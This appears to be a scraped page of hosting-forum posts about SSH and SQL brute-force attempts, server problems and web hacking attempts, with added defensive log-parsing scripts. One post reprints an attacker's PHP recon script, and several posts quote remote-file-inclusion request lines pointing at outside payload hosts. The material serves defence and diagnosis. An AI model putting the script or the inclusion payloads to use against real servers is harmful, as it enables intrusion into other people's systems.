How Do You Fend Off SQL2k5 Constant Login Attempts

Nov 26, 2008

I keep seeing sa login failures in the Event Viewer Application log for MS SQL 2005. I'm tired of blocking off the IPs of the failed attempts. A huge portion of them seem to come from China and Eastern Europe. Should I just block off those regions? Is there a better way of securing SQL 2005?




Constant SSH Login Tries From Numerous IP Addresses (bots)

Apr 26, 2008

I have a dedicated RHEL server with cPanel and my server load spikes about +0.4 (out of 2.0) for about 30 mins every 4-6 hours or so. My regular server load is 0.01, because there is barely any traffic on the server yet, but by looking at my top processes in WHM, I can see that the processes that are spiking the server load when it is high are something like:

sshd: [priv] root
sshd: [priv] root
sshd: [priv] root
sshd: [accepted]
sshd: [priv] games
sshd: [priv] news
sshd: [priv] root
sshd: [priv] root
sshd: [accepted]

...something along these lines. And a lot of times there are 10-20 of these sshd processes at one time.

My server is managed and my dedicated server engineer said it was probably a bot trying passwords. He took one of the IP's, said it was from Taiwan, and blocked that IP in iptables.

However, this is still happening constantly with different IPs. Is there a way to prevent this from happening? I'm the only person (and my host) who should be able to log in to my server using SSH... however, I don't have a static IP and I work from multiple locations, so only allowing certain IPs won't work for me.

First off, is this normal? Or am I being attacked or what? What can I do to remedy this? It seems the bots haven't successfully logged in, but they are spiking my server load which is NOT what I want.


CPanel Login Attempt Failed

Jun 9, 2009

I have not been able to log in to my cPanel from my desktop, which runs WinXP Service Pack 3. Both Firefox and Internet Explorer return the following error message:

Login Attempt Failed!

Also, I am unable to connect using Filezilla Client.

However, I am able to connect to the same cPanel on my colleague's desktop which runs WinXP service Pack3 using Firefox browser or IE. We both share the same internet modem.

- I have cleared all the cookies and private data on my desktop. Still the problem persists.

- I changed to a different user on my desktop, but still could not login.

- I changed my desktop IP address but still I could not log in.

I use DSLinux from within Innotek VirtualBox and I was able to log in to the same cPanel with the same details that were rejected under WinXP.

Would anyone with a solution please advise me on what to do? Thanks in advance.

It is not convenient going to my colleagues desk to access my cPanel.


Server Constant Crash

Jan 3, 2009

I have in my possession a new server which is running cPanel. For some unknown reason it keeps crashing about every 4-6 hours, after which I must get a remote reboot done.

It's starting to annoy me that I'm unable to connect to anything. What I suspect is high disk read/write, as what I'm finding is over 10k blocks being written per second with only 300 being read per second. I also am not seeing any bandwidth out/in usage being high.


Top Usage Over Constant 48/72 Hours

Jul 17, 2009

I am wanting to get access to 'top -c' for a period of 48/72 hours.

Now I have found the following

Code:

top -c -b -d 15 > top.txt
What this does is append the output of 'top -c' to top.txt every 15 seconds.

Now I can make this into a shell script then put it into the background and exit SSH while leaving it running.

Now the question is: will this add much server load over the 48/72 hrs? It will be checking 4 times every minute.


Constant Uptime Connections

May 5, 2008

I thought I'd just post a quick message on here to see what you guys make of this situation. It's only happened in, what, the past hour or so, but when I check the visitor logs on our website it seems that a "YouMonitor.us" is constantly spamming connections to the website at 1-second intervals (even less than that in some cases).

Furthermore, it's coming in from different IP addresses all the time and therefore it's inappropriate to block everyone, as they seem to just constantly change.


Apache :: Protect Against Constant F5?

Oct 24, 2013

Today I was informed that some of our Apache instances are vulnerable when serving content while a client is constantly pressing the F5 button in the browser: once it is pressed, CPU load increases, the page becomes slow, etc. (it's dynamic content served by back-end Tomcats). At the same time I see errors with the connection between Apache and the Tomcat instances.

Is there any good way to protect Apache against it?


Constant Server Crash, How To Trace?

Apr 21, 2007

My server is constantly crashing (halting dead) and needing a reboot literally every few hours. I cannot trace the cause of this whatsoever. Please help out.

CPU/Memory/MySQL Usage shows no accounts in red or yellow zone ....


Stress Tests- Benchmarks- Constant Load

Jun 15, 2007

I was having issues with what I would like to think of as power.

Now, I was wondering if there are any SQL database benchmarks, or something else I can run on the system for a given period of time, that will let me see if I'm still having those power issues.


BQBackup, Constant Issues For Weeks With No Resolution In Sight

Aug 12, 2008

We first noticed the issue on July 19th. Backups were taking a while to transfer from our own servers, and we were getting tickets from clients asking why this was happening. At the same time, it took about 4-5 minutes to log into the backup console. The issue seemed to correct itself so that backups were possible, and we assumed that Scott would be aware of it and would work to resolve it.

Again on the 29th it slowed completely. We immediately dispatched an email to their support address asking what's up, and gave them detailed information such as access to the script and the output so he could monitor it.

The same day a few hours later we got a response that he would run the script and monitor it.

On the 31st, after not getting an update I asked what was going on. He said he ran the script, it seemed to stall for long periods of time and he would know more in the afternoon.

After not getting an update for ~5 days I asked what was going on and expressed that I was not happy with the lack of communication/updates on the situation. He updated me later that day saying that we weren't the only ones being affected. Fair enough, he is working on it. That's all I wanted to hear.


Now ever since that email I received on the 5th (AUG) it has been up and down and all over the place.

After seeing him post on the forums I sent him a PM (10th August); summed up, it was basically saying I had an issue and I need it fixed. I figured that since the PM system is usually pretty good at not losing them, he would see it and respond accordingly; that way there was no chance of it being lost from point A to point B as an email.

Well to this day, no response nor resolution.

I really have exhausted all points of communication, and I want to make it clear that I am not bashing them; when it works it's great. But maybe someone else affected can provide more insight.


Plesk 12.x / Linux :: Constant Alarm Level Change

Jul 20, 2015

Not sure why, but for some reason lately our Plesk installation randomly sends us notification emails about alarm level changes, which go from green to yellow, yellow to red, then go back to normal over time. No changes were made on the server for these constant changes and emails to occur. We have a customer who also has the same issue. Both focus primarily on nginx with little to no usage of Apache.


Plesk 11.x / Linux :: Constant Alarm Level Changed Emails

Jul 21, 2012

This problem has been reported before Plesk Panel 11. What's the current solution for this problem? I've had this problem since I upgraded to Plesk Panel 11.09.

I'm getting spammed with emails like:

Server health parameter "Services > Apache memory usage" changed its status from "green" to "yellow".


Plesk 11.x / Linux :: Constant Unable To Connect To Database While Upgrading / Repairing

Aug 11, 2014

I had Plesk 10 installed on my openSUSE system (it was a low version, maybe 11 or less) and then decided to upgrade to 11.5. So I did distribution upgrades to openSUSE 12.3 and everything went smoothly, except for some services like MySQL and PHP. So I used the Plesk autoinstaller to fix the PHP error and edited an outdated line in the MySQL configuration, and both services ran smoothly!

Then I downloaded Plesk autoinstaller and ran the autoinstaller, but was surprised by this error message:

===> Checking for previous installation ... found.
ERR (3) [panel]: Error during product key mode determination, details: Unable to connect to database: ; trace: #0 /usr/local/psa/admin/plib/functions.php(2821): isPpaKeyRequired()
#1 /usr/local/psa/admin/plib/common_func.php3(11): require_once('/usr/local/psa/...')
#2 /usr/local/psa/admin/plib/api-common/cu.php(5): require_once('/usr/local/psa/...')
#3 /usr/local/psa/admin/sbin/httpdmng(8): include_once('/usr/local/psa/...')
#4 (main)

Unable to connect to database:

- My MySQL version is: 5.5.33 openSUSE package
- I did run mysql_upgrade with my admin username and password (password from /etc/psa/.psa.shadow) and it worked successfully and fixed all of the errors. I did so after running the autoinstaller first, but then ran the installer again and the problem was still there.
- I can access my web page, but it still doesn't connect to MySQL either.

I believe this is a problem with MySQL, but how can I make sure, or detect what exactly the problem is?


Possible Break-in Attempt

Mar 19, 2008

I have reported this to BurstNET admin/abuse/NOC and have added a line to block them for now.

Does this belong to anyone? Nslookup/dig reveal nothing.

This is from my /var/log/messages:
Mar 19 19:24:50 ginger sshd[11565]: Failed password for root from 66.197.245.241 port 46346 ssh2
Mar 19 19:24:50 ginger sshd[11565]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:51 ginger sshd[11567]: Failed password for root from 66.197.245.241 port 46407 ssh2
Mar 19 19:24:52 ginger sshd[11567]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:53 ginger sshd[11569]: Failed password for root from 66.197.245.241 port 46468 ssh2
Mar 19 19:24:53 ginger sshd[11569]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:55 ginger sshd[11571]: Failed password for root from 66.197.245.241 port 46531 ssh2
Mar 19 19:24:55 ginger sshd[11571]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:57 ginger sshd[11573]: Failed password for root from 66.197.245.241 port 46584 ssh2
Mar 19 19:24:57 ginger sshd[11573]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!

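The SQL Server post at the top of this page and the sshd log above come down to the same task: count failures per source address, act on the sources over a threshold, and never act on your own addresses. The "POSSIBLE BREAK-IN ATTEMPT" text is only sshd noting that the client's reverse DNS name does not resolve back to the connecting address; it is a DNS mismatch, not evidence that anything got in. The script below is an added example, not code from either post or from any tool: it parses the sshd lines quoted above plus constructed SQL Server event 18456 lines ("Login failed for user ... [CLIENT: ip]"); the threshold, the allow-list and the iptables rule shape are my assumptions.

```python
import re
from collections import Counter, defaultdict
from ipaddress import ip_address

# sshd failures as syslog writes them to /var/log/messages or /var/log/secure
SSHD_FAIL = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[0-9.]+) port \d+"
)
# SQL Server event 18456 text as it lands in the Windows Application log;
# the "[CLIENT: ip]" suffix is the part this relies on
MSSQL_FAIL = re.compile(
    r"Login failed for user '(?P<user>[^']+)'.*\[CLIENT: (?P<ip>[0-9.]+)\]"
)

# Constructed sample: the sshd lines quoted in the post, one stray failure for
# a non-existent user, six 'sa' failures from one host and seven from an
# address that belongs to us (so it must never be blocked).
SAMPLE_LOG = [
    "Mar 19 19:24:50 ginger sshd[11565]: Failed password for root from 66.197.245.241 port 46346 ssh2",
    "Mar 19 19:24:50 ginger sshd[11565]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!",
    "Mar 19 19:24:51 ginger sshd[11567]: Failed password for root from 66.197.245.241 port 46407 ssh2",
    "Mar 19 19:24:53 ginger sshd[11569]: Failed password for root from 66.197.245.241 port 46468 ssh2",
    "Mar 19 19:24:55 ginger sshd[11571]: Failed password for root from 66.197.245.241 port 46531 ssh2",
    "Mar 19 19:24:57 ginger sshd[11573]: Failed password for root from 66.197.245.241 port 46584 ssh2",
    "Mar 19 19:30:02 ginger sshd[11601]: Failed password for invalid user games from 198.51.100.7 port 40112 ssh2",
] + ["Login failed for user 'sa'. [CLIENT: 203.0.113.5]"] * 6 \
  + ["Login failed for user 'sa'. [CLIENT: 192.0.2.10]"] * 7


def parse_failures(lines):
    """Yield (ip, user) for every failed-login record either pattern recognises."""
    for line in lines:
        m = SSHD_FAIL.search(line) or MSSQL_FAIL.search(line)
        if m:
            yield m.group("ip"), m.group("user")


def offenders(lines, threshold=5, allowlist=()):
    """Return {ip: {"failures": n, "users": [...]}} for sources at or above threshold.

    Addresses in allowlist are skipped however many failures they produce,
    so a typo in your own password cannot lock you out.
    """
    counts = Counter()
    users = defaultdict(set)
    for ip, user in parse_failures(lines):
        counts[ip] += 1
        users[ip].add(user)
    return {
        ip: {"failures": n, "users": sorted(users[ip])}
        for ip, n in counts.items()
        if n >= threshold and ip not in allowlist
    }


def block_commands(report):
    """iptables rules for the reported sources, in address order (assumed rule shape)."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(report, key=ip_address)]


if __name__ == "__main__":
    report = offenders(SAMPLE_LOG, allowlist={"192.0.2.10"})
    for ip, info in sorted(report.items()):
        print(f"{ip}: {info['failures']} failures as {','.join(info['users'])}")
    print("\n".join(block_commands(report)))
```

Blocking by address buys little against a botnet that rotates sources, which is why tools that do this (fail2ban and the like) expire their rules. The durable fixes are key-only SSH with PermitRootLogin set to no, and for SQL Server not exposing TCP 1433 to the Internet at all, or at least disabling the sa login and using Windows authentication.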

Is This A Hacking Attempt

Feb 22, 2007

In the referrer logs that I keep on a website, I have come across the following this morning. Is this someone who is trying to gain access to the server, etc.?

[url]
[url]
[url]
[url]
[url]

I have the IP addresses that they have come from and it resolves to a Russian (I think) website.

I'm just looking through all the folders on the server now and no data has been compromised as far as I can see, and I'm going to use the query strings in order to block access and also deny access via IP address.


Hack Attempt

Jan 31, 2007

I have started seeing the following error in the Event Viewer every day:

"An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day."

The IP address is different every time. It is not an internal IP address or any I recognize. It is from the outside. I have read about this in the Microsoft site but it only mentioned how it might be an internal service/application attempting the access. This is not my case since I am seeing remote IP addresses. Anyone can help me dig deeper into this? How can I find out more about what's going on?


Hacking Attempt

Sep 13, 2007

see the log entries below:

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{X-Forwarded-For}i\""

1.2.3.4 - - [12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"

1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"

What can you say from the above log entries?


VPS With WHM/cPanel Webmail - Login ... Then Login Fails

Jan 31, 2008

Just got a new additional VPS with WHM/cPanel.

Browse to www.mydomain.com/webmail and get login box > login accepted and taken to Horde/Squirrelmail choice screen > choose Squirrelmail and get login box ... login not accepted! > Retry and choose Horde ... login not accepted!

The login is correct and the results are the same when logging in as root, or through /cPanel or /Webmail.


Hacking Attempt On Site

Jul 20, 2008

I am having an issue with my server. Someone is trying to execute some code and possibly trying a MySQL injection method.

I have pasted the code below.

Please suggest what can be done in this case.

Regards
Gagandeep

+++++++++++

The person tried to use different IPs and different websites to execute the code.

URL >> IP

[url]

[url]

[url]

ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156

There are many such queries under my logs.

The person is using different IPs, so I can't even block that many IPs.

++++++++++++

The CODE

<?php
// Recon script as posted: it prints uname, uid, working directory and disk
// usage back to the attacker's browser to confirm that code execution worked.
function ConvertBytes($number) {
    $len = strlen($number);
    if ($len < 4) {
        return sprintf("%d b", $number);
    }
    if ($len >= 4 && $len <= 6) {
        return sprintf("%0.2f Kb", $number / 1024);
    }
    if ($len >= 7 && $len <= 9) {
        return sprintf("%0.2f Mb", $number / 1024 / 1024);
    }
    return sprintf("%0.2f Gb", $number / 1024 / 1024 / 1024);
}

echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);   // bare constant: PHP 5 takes it as the string "id" and runs `id`
$pwd1 = @getcwd();
$free1 = diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) { $free = 0; }
$all1 = disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) { $all = 0; }
$used = ConvertBytes($all1 - $free1);
$os = @PHP_OS;

echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>


Notifying DC Of Hack Attempt

May 30, 2007

Usually I just block offending machines that try to get into our systems and move on, but for the last 2 days I have started notifying the contacts in the ARIN info for offending IPs. I guess I am trying to do my part to make the internet a better place?

Is this stuff largely ignored?

Is anyone else doing this?

Is there an easier way?


Hack Attempt? I'm Pretty Sure...

Jul 8, 2007

A new client has just opened up an account and the first thing he's installed is a few scripts called r57shell and c99shell. I'm not very familiar with these two scripts, but by the looks of them they're root kits of some sort. Am I correct in thinking this?

The account has been suspended for the time being.


Lfd Warning: Hack Attempt Or Legit

May 18, 2009

Code:

Mon May 18 15:17:08 2009 lfd: *Suspicious File* /tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan [someuser:someuser] - Suspicious directory
The 'someuser' is a legitimate user on the server, an auto body website set up last October.

The content of the directory:

Quote:

root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/CPAN]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 361 May 16 17:54 MyConfig.pm

File content:

Code:
$CPAN::Config->{'cpan_home'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan";
$CPAN::Config->{'build_dir'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/build";
$CPAN::Config->{'histfile'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/histfile";
$CPAN::Config->{'keep_source_where'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/sources";
1;
__END__

Code:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpcpan/STABLE]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 735 May 16 17:54 modules.versions


Index.php Not Working After Hack Attempt

Jun 24, 2008

I had an untapped image upload site on my server which I forgot about. Some guys or kids uploaded something noxious and neutralized all the index.php files. This was a hack attempt with SSH.

We noticed that, closed this account and deleted the uploaded files. But there is a quirky problem: none of the index.php files work after this attempt. The index file works after changing its name, for example to "mindex.php".

We updated all the services and rebuilt Apache, but it's still not working. We can't use any index.php on the server.

Additionally, there are 34 possible trojans appearing on the server. I tried to delete them with BitDefender but can't do that. (I checked that in WHM / Scan for Trojan Horses.)


Attempt To Install RoR, Libsafe Stops Me

Apr 12, 2008

Whenever I attempt to install RoR, libsafe stops me. How do I disable libsafe so I can install RoR, then re-enable libsafe?

[root@server1 ~]# gem install rails --include-dependencies
Libsafe version 2.0.16
Detected an attempt to write across stack boundary.

Terminating /usr/bin/ruby-bin.
uid=0 euid=0 pid=20960
Call stack:
0x4c0e6871 /lib/libsafe.so.2.0.16
0x4c0e6c5d /lib/libsafe.so.2.0.16
0x80549b8 /usr/bin/ruby-bin
0x8054a52 /usr/bin/ruby-bin
0x80556af /usr/bin/ruby-bin .....


AWStats Exploit Attempt Prevention

Jun 4, 2008

One of my clients seems to be attracting unwanted attention; it seems as if bots or something along those lines are attempting to exploit my box, while they are unsuccessful it would seem. I was wondering if there was a rule I could put in ModSecurity that would ban them for attempting to

GET "/awstatsf/logger.php?action=log&type=Hybrid&host=hacked101&"

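The two libwww-perl log lines in the "Hacking Attempt" post, the ftp:// URL in the "Hacking Attempt On Site" post and the awstats logger.php probe above are one attack class: a parameter whose value is a complete URL, which a vulnerable include() fetches and executes (remote file inclusion), sent by a scripted scanner that walks through lists of known-bad paths. Below is an added example, not from any post and not a ModSecurity rule, that classifies access-log lines written in that post's LogFormat. The sample lines are constructed: 203.0.113.9 and the parameter name "page" stand in for the URLs the posts redacted, and the probe-path and user-agent fragments are my assumptions.

```python
import re
from urllib.parse import parse_qsl

# One line in the post's LogFormat (combined log plus X-Forwarded-For at the end)
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# A parameter value that is itself a URL is the remote-file-inclusion signature
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.I)
# Assumed, not from any ruleset: path fragments probed in the posts, and the
# user-agent of the Perl HTTP library that scripted scanners commonly use
PROBE_PATH_FRAGMENTS = ("awstats", "logger.php")
SCANNER_UA_FRAGMENTS = ("libwww-perl",)

# Constructed sample lines in the post's format
SAMPLE_LINES = [
    '1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=http://203.0.113.9/stringa.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"',
    '198.51.100.4 - - [04/Jun/2008:09:12:41 +0000] "GET /awstatsf/logger.php?action=log&type=Hybrid&host=hacked101& HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "-"',
    '87.118.118.156 - - [20/Jul/2008:02:33:10 +0530] "GET /index.php?page=ftp://212.11.127.86/tmp/trem/1? HTTP/1.1" 200 4120 "-" "Mozilla/5.0" "-"',
    '192.0.2.20 - - [20/Jul/2008:02:35:00 +0530] "GET /index.php?page=about HTTP/1.1" 200 5120 "http://www.example.com/" "Mozilla/5.0" "-"',
]


def classify(line):
    """Parse one access-log line; return its fields plus the reasons it looks hostile.

    Returns None for a line that does not match the format; "reasons" is an
    empty list for a line that parsed but raised no flag.
    """
    m = ACCESS_RE.match(line)
    if m is None:
        return None
    # Split by hand: urlsplit() would read a leading '//' as a host name
    path, _, query = m.group("target").partition("?")
    reasons = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_SCHEME.match(value):
            reasons.append(f"remote URL in parameter {name}")
    if any(frag in path.lower() for frag in PROBE_PATH_FRAGMENTS):
        reasons.append("known probe path")
    if any(frag in m.group("ua") for frag in SCANNER_UA_FRAGMENTS):
        reasons.append("scanner user-agent")
    return {"ip": m.group("ip"), "path": path, "status": int(m.group("status")),
            "reasons": reasons}


def scan(lines):
    """Return the parsed records that carry at least one reason, in input order."""
    hits = []
    for line in lines:
        rec = classify(line)
        if rec and rec["reasons"]:
            hits.append(rec)
    return hits


def sources(hits):
    """Distinct offending addresses, for a review list rather than an automatic block."""
    return sorted({h["ip"] for h in hits})


if __name__ == "__main__":
    for rec in scan(SAMPLE_LINES):
        print(f'{rec["ip"]} {rec["status"]} {rec["path"]}: {"; ".join(rec["reasons"])}')
    print("review:", ", ".join(sources(scan(SAMPLE_LINES))))
```

The parameter check is the one that matters; the user-agent and path lists only catch lazy scanners, and any scanner can send a browser-like user-agent. Expect the parameter check to flag legitimate redirect-style parameters too, so feed it into a review list rather than an automatic block. On the PHP side this class of attack only succeeds when allow_url_include is on (before PHP 5.2, when allow_url_fopen is on); the attempts logged in the posts returned 404 because the probed script was not there at all, and a 200 with a URL parameter, like the third sample line, is the one to go and look at.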

Proftpd Timeout Connection Attempt Failed

Jan 2, 2007

Currently having a problem with proftpd on my CentOS Plesk 8.1 server.

During large uploads, let's say around 10 MB, the FTP connection fails within 5 minutes or so, saying:

"A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond."

I have asked for help from my server provider but they have tried and are now unable to help.

I currently have the APF firewall in my server.

Has anyone experienced this?

Below is the APF config file that I currently have and the proftpd config files that I have; if anyone can help it would be really, really appreciated.

APF CONFIG:

Code:
#!/bin/sh
#
# APF 0.9.6 [apf@r-fx.org]
#
# NOTE: This file should be edited with word/line wrapping off,
# if your using pico please start it with the -w switch
# (e.g: pico -w filename)
#

##
# [Devel Mode]
# !!! Do not leave set to (1) !!!
# When set to enabled; 5 minute cronjob is set to stop the firewall. Set
# this mode off (0) when firewall determined to be operating as desired.
##

# Set firewall cronjob (devel mode)
# 1 = enabled / 0 = disabled
DEVEL_MODE="0"

##
# [Main]
##

# The installation path of APF; this can be changed but it has not
# been tested what would happen.
INSTALL_PATH="/etc/apf"

# Untrusted Network interface(s); all traffic on defined interface will be
# subject to all firewall rules. This should be your internet exposed
# interfaces. Only one interface is accepted for each value.
# NOTE: The interfacing structure is being worked towards support of MASQ/NAT
IFACE_IN="eth0"
IFACE_OUT="eth0"

# Trusted Network interface(s); all traffic on defined interface(s) will by-pass
# ALL firewall rules, format is white space or comma seperated list.
IFACE_TRUSTED=""

# Enable virtual network subsystem; creats independent policy ruleset for each
# ip on a system (pulls data from 'ip addr list') to /etc/apf/vnet/ip.rules
# Template is located in the vnet/ folder for rule files. This feature can
# reduce apf start/stop performance and is not recommend for systems with more
# than 255 (/24) ip's. [0 = Disabled / 1 = Enabled]
SET_VNET="0"

# Support Monolithic kernel builds [no LKM's]. This mode of operation is
# not really supported and you use at your own risk.
SET_MONOKERN="0"

# Verifies that all inbound traffic is sourced from a defined local gateway MAC
# address. All other traffic that does not match this source MAC address will be
# rejected as untrusted traffic. It is quite trivial to forge a MAC address and as
# such this feature executes NO default accept policy against this MAC address.
VF_LGATE=""

# Verifies that the IF and IFACE_TRUSTED interfaces are actually routed (/sbin/route)
# to something. If not then chances are APF will not start properly if at all.
VF_ROUTE="1"

# Verifies that crond service is running when DEVEL_MODE=1; if not then APF will not
# try to load as if lock-up occures no cron service to flush firewall
VF_CROND="1"

# Verifies that the current system uptime is greater than this value before APF
# can activate. This is to prevent on-boot lockup issues or delays due to excessive
# amount of firewall rules. Value is in seconds; should you wish to disable this
# feature, simply set VF_UTIME to 0 value. !! NOTE: APF WILL NOT START ON IT's OWN;
# IT WILL EXIT WITH FATAL ERROR BELOW SET UPTIME !!
VF_UTIME="0"

##
# [Packet Filtering/Handling]
##

# How to handle TCP packet filtering?
#
# RESET (sends a tcp-reset; TCP/IP default)
# DROP (drop the packet; stealth ?)
# REJECT (reject the packet)
TCP_STOP="DROP"

# How to handle UDP packet filtering?
#
# RESET (sends a icmp-port-unreachable; TCP/IP default)
# DROP (drop the packet; stealth ?)
# REJECT (reject the packet)
# PROHIBIT (send an icmp-host-prohibited)
UDP_STOP="DROP"

# How to handle all other packet filtering? (icmp,arp,igmp)
#
# DROP (drop the packet)
# REJECT (reject the packet)
DSTOP="DROP"

# The sanity options control the way packets are scrutinized as
# they flow through the firewall. The main PKT_SANITY option is a
# top level toggle for all SANITY options and provides general
# packet flag sanity as a pre-scrub for the other sanity options
PKT_SANITY="1"

# Block any packets that do not conform as VALID; this feature
# is safe for most but some may experience protocol issues with
# broken remote clients
PKT_SANITY_INV="0"


Captured Hack Attempt - PHPCoin URL Hole

Jun 25, 2007

Just an FYI: we have been monitoring some attempts from Europe. Here is a file that they were trying to include using a hole in PHPCoin's URL handler:

[URL removed] stringa.txt

The attempt was coming from linux.htd-information.dk


Copyrights 2005-15 www.BigResource.com, All rights reserved